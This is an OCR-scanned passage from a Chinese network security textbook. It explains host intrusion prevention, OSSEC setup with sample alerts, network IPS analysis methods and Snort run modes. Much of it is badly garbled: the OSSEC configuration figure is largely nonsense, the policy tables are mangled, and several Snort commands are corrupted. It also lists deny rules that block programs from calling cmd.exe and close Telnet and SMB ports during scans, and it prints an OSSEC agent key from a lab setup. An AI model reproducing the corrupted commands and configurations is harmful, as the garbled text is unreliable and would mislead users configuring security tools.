的 一 部 分 。 系 统 调用 钩子 相当 于 内 核 和 程序 之 间 的 代理 , 当 程 序 通 过 系统 调用 要 求 内 核 
完成 有 关 操 作 时 ,钩子 负责 对 操作 进行 检测 和 判定 ,只 将 正常 访问 请 求 转发 给 内 核 , 这 种 
实现 是 目前 比较 常用 的 机 制 。 有 些 攻击 是 针对 操作 系统 的 TCP/IP 组 件 ,针对 这 类 攻击 ， 
必须 在 网 卡 驱动 和 TCP/ 卫 组件 之 间 设 置 监测 程序 , 即 网 络 信息 流 监测 器 ,监测 信息 流 是 
和 否 违反 安全 策略 或 者 包含 已 知 攻击 特征 等 。 

































































系统 调用 鬼 子 
应 用 程序 应 用 程序 TCpnps 作 | 
! 系统 调用 钧 子 网 络 信息 流 监测 器 “| 
增加 IPs 功 能 的 1 
系统 内 核 
系统 内 核 网 #g 动 | 
t 本 
主机 资源 主机 资源 Internet 
(a) (b) (9) 


图 8-17 HIPS 的 操作 截获 机 制 


2. 数据 采集 

为 判定 操作 的 合法 性 ,必须 采集 操作 的 具体 信息 ,包括 发 起 请 求 的 进程 .所 属 用 户 、 操 
作 的 类 型 .操作 的 对 象 . 用 户 的 状态 、 主 机 的 位 置 、 主 机 的 状态 等 ,HIPS 必须 结合 这 些 具 
体 信息 进行 判定 。 

操作 的 对 象 即 访问 的 主机 资源 ,主要 包括 网 络 、 内 存 、 进 程 文 件 和 配置 。 

(1) 网 络 : 网 络 资源 指 主机 连接 网 络 的 通道 ,一 般 指 TCP 连接 和 UDP 端口 ,必须 对 
网 络 资源 的 使 用 者 和 使 用 过 程 严格 监测 。 

(2) 内 存 : 恶意 代码 必须 被 激活 才能 实施 攻击 ,激活 意味 着 要 分 配 内 存 空间 并 加 载 
该 代码 ,因此 必须 监测 内 存 空 间 的 分 配 过 程 。 

(3) 进程 : 恶意 代码 运行 时 或 者 作为 独立 进程 ,或 者 嵌入 其 他 进程 作为 线程 ,而 进程 
和 线程 可 以 由 父 进 程 生成 ,因此 必须 对 生成 进程 和 线程 的 过 程 严 格 监测 。 

(4) 文件 : 恶意 代码 如 果 要 长 期 存在 于 主机 中 ,必须 嵌入 某 个 合法 文件 或 者 单独 作 
为 文件 存在 于 系统 中 ,因此 必须 对 文件 的 操作 过 程 严 格 监测 。 

(5) 配置 : 如 Windows 注册 表 和 防火 墙 配置 等 ,是 恶意 代码 经 常 修改 的 地 方 ,需要 严 
格 监测 与 安全 有 关 的 系统 配置 信息 的 修改 过 程 。 
主机 位 置信 息 包括 主机 的 IP 地址、 域名 信息 `VPN 客户 账号 、 网 卡 接口 类 型 .网 关 IP 
地 址 等 。 用 户 状 态 信息 通常 指 用 户 所 属 的 角色 及 其 所 拥有 的 权限 集合 。 系 统 状态 信息 直 
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接 影响 HIPS 的 安全 功能 ,常用 状态 包括 : 

(1) 安全 等 级 : 设置 高 .中 、 低 等 ,为 不 同安 全 等 级 设置 不 同 的 安全 策略 。 

(2) 防火 墙 功能 等 级 : 防火 墙 安全 功能 越 强 ,对 HIPS 的 依赖 就 越 小 。 

(3) 是 否 处 于 攻击 中 : 如 果实 时 检测 到 端口 扫描 等 攻击 前 奏 , HIPS 应 该 提升 安全 
策略 。 

(4) 当前 工作 状态 : 如 处 于 系统 安装 或 更 新 状态 时 ,当前 安全 策略 可 以 相应 调整 。 

(5) 操作 系统 的 安全 体检 分 数 : 根据 不 同 的 体检 结果 ,设置 不 同 的 安全 策略 。 

3. 判定 方法 

HIPS 必须 根据 安全 需求 设置 访问 控制 策略 ,凡是 不 符合 安全 策略 的 行为 都 是 可 疑 
行为 ,再 结合 采集 的 操作 信息 判定 操作 是 否 合法 。 例 如 ,可 以 设置 除 用 户 认 可 的 安装 行为 
外 ,任何 其 他 进程 都 不 允许 修改 注册 表 。 

一 般 做 法 是 首先 制定 不 同安 全 等 级 的 安全 策略 ,然后 将 安全 策略 与 系统 、 用 户 和 主机 
状态 相 结 合 ,构成 访问 控制 策略 。 安 全 策略 通常 由 以 下 几 部 分 组 成 : 

(1) 名 称 : 用 于 唯一 标识 该 策略 。 

(2) 类 型 : 用 于 指明 资源 访问 类 型 。 

(3) 动作 : 该 策略 执行 何 种 判定 动作 。 

(4) 请 求 发 起 者 : 具体 的 请 求 进程 请求 用 户 等 。 

(5) 操作 : 对 主机 资源 采取 何 种 操作 。 

(6) 对 象 : 具体 的 资源 名 称 。 

表 8-2 给 出 了 几 个 安全 策略 的 实例 , 表 8-3 结合 系统 状态 给 出 访问 控制 策略 的 示例 。 
当 子 网 处 于 端口 扫描 时 ,存在 一 定 危险 性 ,可 以 启动 拒绝 Telnet 访问 和 网 络 共 享 访问 的 
A5 策略 ,提升 安全 等 级 。 


表 8-2 安全 策略 示例 








各 称 | 类 型 | 动作 请 求 发 起 者 操 作 对 象 
。 Web 服务 程序 ， 如 HTML 文件 (*.htm， 
a 遇 间 裕 侍 撕 钨 JIS,Apache 汪 *. html) 
A2 | 访问 注册 表 | 允许 | 安装 程序 (setup. exe, | 写 具体 的 注册 表 项 
install. exe) 





浏览 器 程序 (iexplore 
A3 网 络 访问 登记 | .exe, mozilla. exe, firefox | 发 起 连接 
. exe. chrome. exe) 
A4 进程 控制 拒绝 | 可 执行 程序 调用 Cmd. exe, command. exe 
A5 网 络 访问 拒绝 | tlntsvr. exe,svchost. exe “| 接受 连接 | 端口 23、135 .445 


端口 80 和 443(HTTP 和 
HTTPS) 























表 8-3 访问 控制 策略 示例 


主机 位 置 系统 状态 安全 策略 
192. 168. 0/24 正常 A2 
192. 168. 1/24 受到 端口 扫描 A5 
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4. 执行 决策 

如 果 操 作 请 求 属于 正常 行为 ,HIPS 应 该 允许 该 操作 正常 执行 。 否 则 可 以 执行 以 下 动作 : 

(1) 终止 进程 。 一 旦 判定 操作 非法 ,立即 终止 该 进程 ,并 释放 为 进程 分 配 的 所 有 主机 
资源 。 

(2) 拒绝 请 求 。 请 求 虽然 非法 ,但 是 阻止 该 请 求 不 会 对 主机 的 正常 运行 造成 影响 ,此 
时 可 以 仅 拒绝 该 请 求 , 但 是 不 终止 进程 。 

(3) 记录 分 析 。 该 请 求 可 能 是 某 个 完整 攻击 的 一 部 分 ,因此 需要 记录 该 情况 ,并 报告 
给 管理 员 。 

以 下 介绍 一 款 开 源 HIPS 产品 OSSEC 。 

OSSEC9 是 一 款 开源 多 平台 HIPS, 可 以 运行 于 Windows、Linux 和 各 类 UNIX 操作 
系统 , 它 包 括 日 志 分 析 、 完 整 性 检测 ,rootkits 检测 以 及 基于 时 间 的 报警 和 主动 响应 功能 。 
OSSEC 必须 安装 在 监测 主机 上 , 它 可 以 采用 客户 端 /服务 器 模式 来 运行 ,以 方便 管理 多 台 
运行 OSSEC 客户 的 主机 ,客户 机 会 把 监测 数据 发 回 到 服务 器 进行 分 析 。 它 的 日 志 分 析 
引擎 十 分 强大 ,已 经 被 诸多 ISP(Internet Service Provider) 大 学 和 数据 中 心 用 于 监控 和 
分 析 日 志 。 

OSSEC 默认 安装 在 /var/ossec 目录 ,服务 端 同样 具备 对 本 地 主机 的 入 侵 防御 功能 ， 
其 一 般 工 作 流 程 如 下 : 

(1) 配置 “/var/ossec/etc/ossec. conf”( 图 8-18) ,服务 端 需要 配置 规则 和 安全 策略 ， 
客户 端 主要 配置 监测 对 象 ,客户 端 不 负责 生成 报警 ,只 负责 把 事件 传 回 服务 器 。 


ostcefte> 
<glob 











<log atert_levelylc/og_atert levety 
onal nottr teattonayess/enat nottr tcatton> ‘<enatl_alert level>7</enatl alert Level> 
<enatl-to>root@localhost</enatl i 部 件 通知 cjalertsy 
Smtp_Seryer>127 ea 2 
<enatl._fron>ossecn@ubuntu</enatl_fron> <nane>host-deny</nane> 
</global> ‘enecutableshost-deny, she/enecutable> 
<expect>srctpe/expect: 
<tineout_allowed>yes</tineout_allowed> 
‘onftg. xnl</tnclude> ommend> 
ele pan roles AhL s/tnc lade> <acttve-respon 
< ecommand>host deny/ lcommand> 
<locatton>local</locatton> 主动 应 设置 
yscheck> <level>6</level> 
<frequency>79200</freqvency> <tineout>600</tineout> 
drettortes check/ alta’yes!> /btn, /sbtn</dtrectortes> </active-response> 
tgnore>/etc/ntabs/tgnore> ME ftle> 
</sysc 1 jslog</ log_f' 实时 蚊 的 文件 
etehech ledstton vey leg aut Lege tocatton 
rootktt” flles>/Y rossec/et/shared/rootktt_ftles.txte/rootktt_ rtles> < 
</rootcheck> 


dc11og_format> 还 可 以 监测 命 信 拍 出 的 变化 
<comand>netstat ~ | [rs si lerep ~V 127.0.0.1 | sort</command> 
‘syslog</connectton> 定义 与 守 记 庄 肖 信 方式 </localflle> 

</ossec conftq> 






8-18 ”OSSEC 服务 端的 配置 文件 示例 


(2) 服务 器 执行 “manage_agents” 增 加 客户 端 (图 8-19) ,因为 客户 服务 器 之 间 采 用 安 
全 通信 ,因此 必须 生成 客户 的 密 钥 ,安全 传递 给 客户 端 后 才 可 以 有 效 通 信和 ,通信 端口 默认 
是 UDP 的 1514 端口 。 

(3) 服务 器 执行 “ossec-control start” 运 行 HIPS( 图 8-20) 。 

(4) 客户 端 执行 “manage_agents” 导 入 密 钥 (图 8-21) ,客户 执行 同样 指令 运行 HIPS， 
与 服务 器 建立 安全 通信 的 通道 (图 8-22)。 


四 ”https://ossec. github. io/ 。 


ooteubuntu: /var/ossec/btn# ./manage_agents 


OSSEC HIDS v2.8.3 Agent manager. 
The following options are available 
(A)dd an agent (A). 
(E)xtract key for an agent 《(E). 提取 该 客户 滑 的 窗 角 
(L)tst already added agents (L). 
(R)enove an agent (R). 
(Q)uit. 
hoose your actton: A,E,L,R or Q: E 


vailable agents 
ID: 0081, Name: win7, IP: 192.168.2.261 
ID: 802, Name: linux_agent, IP: 192.168.2.163 
provide the ID of the agent to extract the key (or 


gent key tnformatton for '002' ts: 
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'\q"' to qutt): 662 
此 处 即 为 客户 端 密 角 ， 需 要 把 它 拷贝 给 客户 应 


DAyIGxpbnV4X2FnZWSOIDESMi4xNjguMi4xMDMgZDBkMjQxMmZkYWM2OWJLY jBkY2Y40WQyMGNmMTYwMDhjYzZ 


OTQYNDA1MWMONZAOYWJmOTc1ZTUxZWIMY jZmOA: 


* press ENTER to return to the matn menu. 


图 8-19 


root@ubuntu: /var/ossec/bin# ./ossec-control stop 
Killing ossec-monttord .. 
Killing ossec-logcollector .. 
Killing ossec-remoted .. 
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
Killing ossec-matld . 
Killing ossec-execd . 
ossEc HIDS v2.8.3 Stopped 
root@ubuntu: /var /ossec/bin# ./ossec-control start 
Istarting OSSEC HIDS v2.8.3 (by Trend Micro Inc.) 
Cr 
ossec-execd 
ossec-analystsd. 
ossec-logcollector. 
ossec-remoted. 
ossec-syscheckd. 
ossec-monttord 


图 8-20 启动 OS: 





‘oot@ubuntu: /var/ossec/bin# ./agent_control 


pssEC HIDS agent_control: Control remote agents. 
Rvailable option 
Thts help message. 


List avatlable (acttve or not) agents. 


List active agents. 








配置 客户 端 


Manage View Help 
DSSECHIDS v28.3 
Agent win7 (003) - 1921682201 
Status Stopped 


OSSEC ServerIP. [192168.2204 
Authentication key 


Save Behesh i 


http://www.ossec.net |Installed on Nov 10 2015 at 08: 





图 8-21 Windows 客户 端 导 人 密 钥 





显示 当前 客户 信 


<td> Extracts tnformatton from an agent. 


<td> Restarts agent. 


-a Runs the tntegrtty/rootktt checktng on all agents now. 
-uU <td> Runs the integrity/rootkit checking on one agent now. 


<tp> Blocks the spectfted tp address. 


命令 套 户 立即 执行 完 


<ar> Used with -b，spectftes whtch response to run 整 性 检查 
List available active responses. 
Changes the output to CSV (comna delinmited). 


‘oot@ubuntu: /var/ossec/bin# ./agent_control -lc 


bssEc HIDS aaent control, List of available aoents; 
ID: 000, Name: Ubuntu (server), IP: 127.0.0.1, Active/Local 


ID: 662，Name: linux_agent, IP: 192.168.2.103, Active 
ID: 003, Name: win7, IP: 192.168.2.201, Active 


图 8-22 





OSSEC 服务 端 与 客户 端 建 


三 个 活动 客户 





2 
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(5) 监测 到 违背 安全 策略 的 事件 ,服务 器 收 到 邮件 通知 ,可 能 会 采取 主动 响应 机 制 
(图 8-23, 图 8-24)。 


* Alert 1497922601.36381: - syslog,access_control,authentication_failed, 
Pe17 Jun 19 18:36:41 (linux_agent) 192.168.2.163->/var/log/auth.log 
Rule: 2501 (level 5) -> 'User authentication failure.' 

Pun 19 18:36:41 ubuntu su[9664]: pam_authenticate: Authenttcatton fatture 


* ALert 1497922601.36653: -syslon, saythenticatinn failed 用 户 su 操作 失败 
入 EE 


log 
Rule: 5301 (level 5) -SUSEr MSS Ue assmord to Cany Cuser 1d)." 
pun 19 18:36:41 ubuntu su[9664]: FAILED su for root by fguo 
客户 发 过 来 的 事 人 
* ALert 1497922661.36921: mail - syslog, su,authentication failed, 
: 5362 (level 9) -> 'User mtssed the password to change UID to root.' 
: root 
un 19 18:36:41 ubuntu su[9664]: - /dev/pts/18 fguosroot 





图 8-23 ”OSSEC 报警 日 志 


1 ossecn@ubuntu Mon Jun 19 18:55 380/751 OSSEC Nottftcatton - (win7) 192.16 


essage 1: 
From ossecn@ubuntu Mon Jun 19 18:55:14 2017 
本 -ortgtnat-To: root@localhost 
: <root@localhost> 
: OSSEC HIDS <ossecmeubuntu> 
: Mon, 19 Jun 2017 18:55:14 -9700 
: OSSEC Notification - (win7) 192.168.2.201 - Alert level 9 


OSSEC HIDS Nottftcatton. 
l2017 Jun 19 18:55:62 


Receilved From: (win7) 192.168.2.201->HLnEvtLoqg 全 人 变 户 端的 应 用 程序 日 志 被 清除 
Rule: 593 fired (level 9) -> “Microsott Event log cleared." 
ortton of the log(s): 


pssec: jEvent log cleared: 'AppLtcatton' 


--END OF NOTIFICATION 





图 8-24 OSSEC 邮件 通知 报警 


OSSEC 默认 实时 监测 “/var/log/auth. log”“*/var/log/syslog” 和 “/var/log/dpkg. 
log" 三 个 日 志文 件 ,定期 对 指定 目录 进行 完整 性 检测 ,定期 监测 预定 义 的 文件 目录 位 置 查 
看 是 否 存在 Rootkits , 过 发 邮件 的 方式 报警 。 在 Windows 系统 ,默认 实时 监测 应 
用 程序 日 志 、 安 全 日 志和 系统 日 志 , 定 期 对 指定 目录 和 注册 表 项 进行 完整 性 检查 ,OSSEC 
在 Windows 系统 只 能 作为 客户 端 存在 。 图 8-23 指明 服务 端 收 到 来 自 *192. 168. 2. 103” 
的 事件 ,用 户 在 执行 “su 操作 时 口令 输入 错误 ,图 8-24 指明 Windows 客户 端 “192. 168. 
2.201” 的 应 用 程序 日 志 被 清除 ,这 两 个 报警 都 是 实时 监控 报警 ， 





















8.3 基于 网 络 的 IPS 


流 , 可 以 保护 网 络 资源 和 
时 分 析 、 入 侵 阻 止 、 


流 经 网 络 链 路 的 信和 
息 捕 获 、 信 息 


基于 网 络 的 IPSCNIPS) 主 要 用 于 检 
统一 防护 网 络 内 部 的 主机 。NIPS 的 工作 流程 包括 人 
报警 登记 和 事后 分 析 。 
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1. 信息 捕获 

NIPS 有 两 种 信息 捕获 方式 , 即 转发 和 探测 (图 8-25)。 转 发 模式 从 一 个 端口 接收 信 
息 流 ,对 其 进行 分 析 , 如 果 是 正常 信息 流 则 转发 ,如 果 是 可 疑 信息 流 则 报警 并 采取 反 制 动 
作 。 探 测 模式 被 动 地 接收 信息 流 , 对 其 进行 分 析 , 如 果 是 可 疑 信息 流 则 报警 并 采取 反 制 动 
作 ,探测 模式 无 法 实时 阻挡 攻击 源 ,但 是 可 以 将 攻击 报 文 所 在 的 TCP 连接 复位 ,阻止 攻击 
者 继续 攻击 。 
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图 8-25 信息 捕获 方式 


2. 实时 分 析 

分 析 机 制 主要 包括 协议 译 码 、 特 征 检 测 和 异常 检测 三 类 。 

协议 译 码 对 IP 分 组 格式 和 传输 层 报 文 格式 进行 检测 ,并 根据 端口 号 和 IP 头 部 的 协 
议 字 段 值 确定 报 文 数据 对 应 的 应 用 层 协 议 ,然后 根据 不 同 协议 对 应 用 层 头 部 信息 进行 检 
测 , 如 果 应 用 层 头 部 与 协议 规范 不 一 致 , 则 可 能 是 攻击 信息 。 

1) IP 分 组 检测 

主要 检测 IP 分 组 各 个 字段 是 否 符合 协议 要 求 , 如 分 片 是 否 正 确 。 许 多 攻击 将 TCP 
报 文 段 头 部 分 散在 多 片 数据 中 ,以 绕 过 对 TCP 头 部 字段 的 检测 。 有 的 攻击 设置 超大 IP 
分 组 ,使 得 所 有 分 片 拼装 后 的 总 长 度 大 于 64K ,导致 目标 系统 崩溃 。 

2) TCP 报 文 段 检测 

监视 TCP 的 流量 控制 窗口 值 ,从 而 判定 TCP 连接 的 发 送 序号 范围 ,检测 是 否 攻击 者 
正在 盗用 某 个 TCP 连接 传输 信息 。 判 定 各 个 TCP 段 的 序号 是 否 连续 ,并 且 没 有 重 秋 ,有 
的 系统 在 接收 序号 有 重 芭 的 TCP 报 文 段 时 ,可 能 出 错 导致 系统 崩溃 。 

3) 应 用 层 协议 检测 

检测 报 文 端口 号 与 实际 的 报 文 内 容 是 否 一 致 ,如 果 不 一 致 ,通常 很 可 能 是 攻击 报 文 ， 
如 木马 或 后 门 利用 端口 80 来 冒充 Web 请 求 。 检 测 应 用 层 协议 的 各 个 字段 值 是 否 在 合理 
范围 内 ,检测 报 文 是 否 符合 协议 规范 ,如 从 Web 服务 器 返回 的 报 文 应 该 是 HTTP 应 答 消 
息 , 如 果 不 是 , 则 该 报 文 值得 怀疑 。 

特征 检测 分 为 元 攻击 检测 和 有 状态 攻击 检测 。 元 攻击 检测 通常 只 检测 单个 报 文中 的 
多 个 特征 字符 串 ,但 是 为 了 识别 分 散在 不 同 报 文中 发 送 的 攻击 特征 ,NIPS 可 以 将 属于 同 
一 个 流 的 报 文 结合 在 一 起 进行 特征 匹配 。 有 状态 攻击 特征 由 分 散在 整个 攻击 过 程 中 的 多 





网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





个 不 同 攻击 特征 标识 ,并 且 它 们 的 出 现 位 置 和 顺序 都 有 严格 限制 ,只 有 在 规定 位 置 .按照 
规定 顺序 检测 到 全 部 特征 ,才能 确定 发 现 攻 击 。 元 攻击 特征 的 表示 方法 请 参考 8. 3. 1 节 
中 Snort IPS 的 规则 表示 。 

异常 检测 的 前 提 是 非法 访问 网 络 资源 的 信息 流 模 式 与 正常 网 络 访问 的 操作 模式 之 间 
存在 较 大 区 别 , 主 要 有 两 种 建立 网 络 信息 流 模式 的 机 制 , 即 基 于 统计 的 机 制 和 基于 规则 的 
机 制 。 

1) 基于 统计 的 机 制 

NIPS 对 正常 访问 时 的 报 文 信息 进行 登记 ,对 IP 分 组 通常 记录 源 和 目标 IP 地 址 、 源 
和 目标 端口 .IP 头 部 协议 字段 值 .TCP 头 部 控制 标志 、 报 文大 小 、 捕 获 时 间 等 。 基 于 这 些 
原始 信息 ,NIPS 可 以 生成 两 类 基准 值 : 四 阔 值 ,如 单位 时 间 内 建立 的 连接 数 、 不 同 终端 发 
起 的 连接 请 求 报 文 数量 、 针 对 特定 服务 器 的 连接 请 求 数 等 ; @ 描 述 单个 或 成 对 指定 主机 
的 行为 ,如 建立 TCP 连接 的 平均 时 间 间 隔 、 平 均 传 输 速率 、 持 续 传输 时 间 分 布 . 报 文 数据 
长 度 分 布 等 信息 。 

在 生成 基准 信息 后 ,NIPS 对 捕获 的 信息 实时 分 析 , 检 测 是 否 和 基准 信息 的 差别 超过 
预 设 的 范围 ,如 超过 则 检测 到 异常 ,可 能 是 攻击 报 文 。 例 如 , 某 台 主机 正常 访问 时 平均 传 
输 速 率 是 1Mb/s, 每 分 钟 发 起 TCP 连接 请 求 数 100 ,在 某 段 时 间 内 ,监测 到 其 平均 传输 速 
率 为 10Mb/s, 且 每 分 钟 发 起 TCP 连接 请 求 达到 1000, 那 么 很 有 可 能 该 主机 正在 进行 
DoS 攻击 。 

2) 基于 规则 的 机 制 

基于 规则 的 机 制 根据 用 户 访 问 网 络 的 特点 总 结 出 限制 指定 用 户 操 作 的 规则 ,如 为 了 
预防 主机 变 成 僵尸 主机 ,可 以 限制 其 TCP 报 文 段 包含 的 最 小 或 最 大 字 节 数 、 限 制 其 单位 
时 间 发 送 的 TCP 连接 请 求 数 、 限 制 其 单位 时 间 针 对 指定 端口 发 送 的 最 大 字 节 数 等 信息 。 

3. 入 侵 阻 止 

入 侵 阻止 的 手段 主要 有 丢 奔 IP 分 组 和 释放 连接 两 种 方式 。 丢 弃 IP 分 组 包括 丢弃 单 
个 分 组 、 丢 弃 所 有 源 IP 与 该 分 组 相同 的 其 他 分 组 丢弃 所 有 目标 IP 与 该 分 组 相同 的 其 他 
分 组 、 丢 弃 所 有 源 和 目标 IP 均 与 该 分 组 相同 的 其 他 分 组 四 种 情况 。 

(1) 如 果 在 单个 IP 分 组 中 检测 到 元 攻击 特征 ,丢弃 该 分 组 即 可 阻止 入 侵 。 

(2) 如 果 攻 击 过 程 分 为 多 个 阶段 进行 ,那么 应 该 在 一 定时 间 范 围 内 丢弃 所 有 与 该 分 
组 的 源 IP 地 址 相同 的 分 组 ,切断 攻击 者 的 后 续 攻 击 步骤 ,从 而 阻止 人 侵 。 但 是 存在 攻击 
者 冒充 该 IP 地 址 发 送 报 文 的 情况 ,此 时 会 导致 拥有 该 IP 地 址 的 主机 无 法 正常 访问 。 

(3) 如 果 IP 分 组 属于 针对 特定 目标 的 分 布 式 攻击 ,此 时 应 该 在 一 定时 间 范 围 内 丢弃 
所 有 目标 IP 地 址 与 该 分 组 的 目标 IP 相同 ,并 且 分 组 的 其 他 特征 也 相似 的 所 有 IP 分 组 ， 
从 而 保护 目标 主机 。 当 然 ,同样 存在 IP 地 址 冒充 情况 ,此 时 可 能 会 影响 许多 正常 用 户 的 
访问 。 

(4) 丢弃 所 有 源 和 目标 IP 与 该 分 组 相同 的 所 有 其 他 分 组 可 以 阻止 单一 攻击 源 针对 
特定 目标 的 多 阶段 攻击 。 

NIPS 只 有 处 于 转发 模式 时 才能 丢弃 IP 分 组 ,处 于 探测 模式 时 只 能 采取 切断 连接 的 
方式 。NIPS 可 以 向 指定 的 TCP 连接 发 送 带 有 复位 标记 的 报 文 ,只 要 报 文 序号 在 双方 的 
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窗口 范围 之 内 ,就 可 切断 TCP 连接 ,终止 入 侵 过 程 。 

4. 报警 

NIPS 只 对 捕获 的 信息 进行 检测 , 它 无 法 检测 出 所 有 攻击 。 由 于 每 段 链 路 的 信息 流 
模式 都 不 是 独立 的 ,所 以 当 NIPS 在 某 段 链 路 分 析出 攻击 报 文 后 ,很 可 能 其 他 没有 部 署 
NIPS 的 网 络 也 存在 攻击 ,此 时 需要 向 控制 中 心 报警 ,使 得 管理 员 能 对 整个 网 络 的 安全 状 
态 进 行 检测 ,并 对 可 能 遭受 的 入 侵 进 行 处 理 。 

5. 登记 和 事后 分 析 

网 络 安全 涉及 多 种 设备 的 协同 部 署 , 各 种 设备 的 安全 策略 常常 需要 根据 网 络 的 状态 
进行 调整 ,因此 需要 及 时 了 解 网 络 受 到 攻击 的 情况 ,如 攻击 者 位 置 、 攻 击 类 型 .攻击 目标 和 
造成 的 损失 等 。NIPS 在 检测 到 攻击 后 ,需要 及 时 记录 攻击 的 有 关 信 息 , 并 对 这 些 信息 进行 
分 类 ,统计 和 分 析 , 为 安全 管理 员 提 供 当 前 网 络 安 全 状态 ,以 便 及 时 调整 设备 的 部 署 和 配置 。 

当前 ,NIPS 产品 种 类 较 多 ,但 是 开源 NIPS 软件 主要 有 Snort .Suricata@ 和 Brog@ 三 
种 ,其 中 Snort 和 Suricata 都 是 基于 特征 检测 的 NIPS, Bro 是 基于 异常 检测 的 NIPS。 
Snort 是 一 款 轻 量 级 的 NIPS,Marty Roesch 于 1998 年 使 用 C 语言 开发 ,现在 Snort 已 经 
是 一 个 支持 多 平台 支持 实时 流量 分 析 、 支 持 网 络 报 文 记录 等 特性 的 强大 NIPS, 它 基于 
Libpcap 库 (Windows 下 称 为 winpcap) 记 录 网 络 报 文 ,是 目前 最 为 流行 的 基于 特征 的 
NIPS。Suricata 可 以 作为 Snort 的 替代 方案 ,在 2010 年 首次 发 布 , 它 支持 多 线程 性 能 调 
优 ,检测 性 能 优 于 Snort, 而 且 其 配置 方式 和 配置 选项 与 Snort 十 分 类 似 ,两 种 NIPS 可 以 
轻松 实现 互相 转换 。 

Bro 与 其 说 是 一 种 NIPS, 不 如 说 是 一 种 网 络 监控 脚本 平台 ,专门 为 网 络 流量 分 析 工 
作 而 设计 。 它 的 脚本 语言 提供 了 特别 适用 于 协议 分 析 的 功能 。Snort 的 规则 语言 更 适合 
从 网 络 流量 中 发 现 一 些 字符 串 信息 ,而 Bro 通常 是 处 理 更 复杂 任务 的 最 佳 选择 。 使 用 
Bro 脚本 语言 编写 规则 可 以 对 网 络 事件 做 深入 分 析 , 但 是 需要 投入 大 量 的 时 间 和 精力 。 

简单 地 说 ,Snort 是 一 个 基于 Libpcap(Libpcap 提供 直接 从 链 路 层 捕获 报 文 的 接口 方 
法 和 过 滤 函 数 ) 的 嗅 探 器 , 它 能 根据 所 定义 的 规则 进行 响应 和 处 理 。Snort 支持 丰富 的 报 
警 和 响应 机 制 ,根据 规则 链 ,可 采取 Alert( 报 警 ) .Pass( 忽 略 ).Log( 不 报警 只 记录 ) 三 种 
响应 机 制 。 其 报警 输出 支持 syslog 文本 文件 .UNIX 套 接 字 数据库 输出 等 。Snort 主要 
由 报 文 捕获 和 解析 模块 .检测 引擎 模块 和 日 志 与 报警 模块 三 个 子 系统 构成 。 

(1) 报 文 捕获 和 解析 模块 : 捕获 原始 数据 报 文 , 并 按照 TCP/IP 的 不 同 层次 进行 解码 
和 预 处 理 , 然 后 提交 给 检测 引擎 进行 规则 匹配 。 

@ 捕获 时 需 将 网 卡 设置 为 混杂 模式 ,然后 将 捕获 的 报 文 送 往 解 码 器 进行 解码 , 报 文 
可 能 是 各 种 格式 ; 

@ 解码 器 将 各 类 报 文 解码 成 Snort 识别 的 统一 格式 ,然后 将 报 文 送 往 预 处 理 器 
解析 ; 


® http://www. snort. org。 
©® https://suricata-ids. org。 
图 https://www. bro. org。 
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@ 预 处 理 器 支持 对 分 片 报 文 重新 组 装 , 以 及 处 理 一 些 明显 错误 。 预 处 理 过 程 主要 通 
过 插件 完成 ,例如 HTTP 预 处 理 器 完成 对 HTTP 请 求解 码 的 规格 化 ,Frag2 事务 处 理 器 
完成 报 文 重 新 组 装 ,Stream5 预 处 理 器 将 不 同 报 文 组 成 TCP 流 ,端口 扫描 预 处理 器 检测 
端口 扫描 等 。 

(2) 检测 引擎 : Snort 的 核心 模块 , 它 采 用 一 个 二 维 链表 存储 检测 规则 ,其 中 一 维 称 
为 规则 头 部 , 另 一 维 是 规则 选项 ,规则 头 部 放置 公共 属性 特征 ,规则 选项 放置 入 侵 特征 。 
规则 匹配 查找 采取 递归 方法 ,检测 机 制 只 针对 当前 已 经 建立 的 链表 选项 进行 检测 , 当 报 文 
满足 某 个 规则 时 ,和 触发 相应 的 操作 。 

(3) 日 志 与 报警 模块 : 按 用 户 配置 的 方式 及 时 记录 和 报警 ,典型 方式 为 以 明文 形式 
记录 报警 信息 、 以 tcpdump 格式 记录 报 文 信息 等 。 

Snort 的 部 署 非常 灵活 ,可 以 运行 在 Windows、Linux 和 各 类 UNIX 操作 系统 上 。 
Snort 主要 通过 各 插件 协同 工作 才 体 现 出 功能 强大 ,因此 部 署 时 选择 合适 的 数据 库 `Web 
服务 器 、 图 形 处 理 程序 软件 及 版 本 十 分 重要 。Snort 部 署 时 一 般 由 传感器 层 ,服务 器 层 、 

54 组 成 。 传 感 器 层 是 网 络 报 文 的 嗅 探 器 ,收集 报 文 并 交 给 服务 器 
果 。 部 署 Snort 时 可 根据 企业 网 络 规 
- 台 主 机 进行 部 署 , 也 可 采用 服务 















层 进 行 处 理 ; 
模 的 大 小 ,采用 三 
器 层 与 控制 台 集 成 的 两 层 结构 。 

Snort 有 三 种 运行 模式 : 嗅 探 嚣 模式、 记录 器 模式 和 NIPS 模式 。 

1. 嗅 探 器 模式 

嗅 探 器 模式 是 Snort 的 默认 运行 模式 ,仅仅 将 捕获 的 网 络 报 文 输出 至 屏幕 (图 8-26)， 
与 tcpdump 类 似 , 但 是 它 可 以 在 报 文 的 特定 部 分 加 上 标签 ,输出 结果 会 较为 美观 。 当 捕 
获 结束 时 , 它 也 提供 一 些 有 用 的 流量 统计 。 











图 8-26 ”Snort 嗅 探 器 模式 示例 


其 命令 行 方式 如 下 : 


snort 一 v -< 接口 名 >  // 使 用 这 个 命令 将 使 Snort 只 输出 他 和 TCP/UDP/IQP 的 报 文 头 部 信息 
snort -vd -i< 接 口 名 > // 输 出 报 文 头 部 信息 的 同时 显示 数据 信息 
snort 一 vde -一半 < 接口 名 > // 进 一 步 输出 链 路 层 头 部 信息 
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Snort 的 选项 开关 可 以 分 开 写 或 者 结合 在 一 起 ,“snort -v -d -e” 与 “snort -vde” 等 价 。 

2. 记录 器 模式 

记录 器 模式 (图 8-27) 与 嗅 探 器 模式 基本 相同 ,区 别 在 于 各 痢 报 交 友基 在 六 作 中 ,而 
不 是 打印 在 屏幕 上 ,通常 使 用 PCAP 格式 进行 记录 ,需要 指定 一 个 已 经 存在 的 日 志 目 录 
从 而 启用 该 模式 。 其 命令 行 方式 如 下 : 

snort —1c:/snort/log // 指 定 日 志 目 录 ,Snort 就 会 自动 记录 报 文 


snort 一 dv —r packet. log // 从 日 志 中 读 取 报 文 信息 并 显示 
snort - dvr packet. log icmp  // 只 从 日 志 中 读 取 ICMP 协议 的 报 文 


pert Nlog enort -109-1498186784 tcp 
从 日 志 中 该 取 TCP 报 文人 


ersdon 2.9.9.8-VIN32 GRE CBuild 56) 
